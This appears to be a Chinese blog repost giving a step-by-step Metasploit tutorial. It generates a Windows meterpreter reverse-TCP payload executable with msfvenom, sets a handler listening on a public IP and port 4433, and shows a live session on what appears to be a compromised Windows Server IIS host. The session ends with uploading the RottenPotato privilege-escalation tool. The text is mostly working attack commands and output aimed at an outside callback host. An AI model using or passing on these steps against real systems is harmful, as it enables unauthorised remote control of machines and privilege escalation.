zoukankan      html  css  js  c++  java
  • msf制作反弹shell

    msf制作shell

    1 .制作反弹shell-exe文件

    执行命令

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
    
    

    LHOST为公网IP

    LPORT为反弹端口

    4433.exe为生成文件

    2.控制端启动msfconsole,获取监听

    运行命令

    msfconsle
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
    msf5 exploit(multi/handler) > set LPORT 4433
    msf5 exploit(multi/handler) > run
    
    
    
    3.反弹成功
    meterpreter > sysinfo
    Computer        : WIN-UKKED2CCSHJ
    OS              : Windows 2012 R2 (6.3 Build 9600).
    Architecture    : x64
    System Language : zh_CN
    Domain          : WORKGROUP
    Logged On Users : 3
    Meterpreter     : x86/windows
    
    meterpreter > getuid
    Server username: IIS APPPOOLpadt002
    
    #上传文件
    meterpreter > upload /root/RottenPotato/rottenpotato.exe
    [*] uploading  : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
    [*] Uploaded 664.00 KiB of 664.00 KiB (100.0%): /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
    [*] uploaded   : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
    
    
    所有的胜利,与征服自己的胜利比起来,都是微不足道;所有的失败,与失去自己的失败比起来,更是微不足道。
  • 相关阅读:
    poj2679
    poj2709
    poj1521
    poj2054
    静脉曲张病案
    眩晕耳鸣病案
    声嘶治验
    甘露消毒丹治疗高热不退一例
    黄芩汤加减治疗腹痛一例
    自残症治愈案
  • 原文地址:https://www.cnblogs.com/8gman/p/12303787.html
Copyright © 2011-2022 走看看